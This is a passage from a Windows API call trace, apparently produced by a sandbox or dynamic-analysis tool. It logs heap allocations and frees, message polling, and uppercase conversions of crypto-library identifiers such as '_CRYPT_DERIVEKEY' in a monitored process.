| out: hHeap=0x970000) returned 1 [0245.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0245.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0245.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0245.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0245.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.038] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0245.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0245.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0245.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0245.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0245.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0245.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0245.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.043] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.043] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.043] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0245.044] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.045] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.045] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0245.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0245.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.046] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 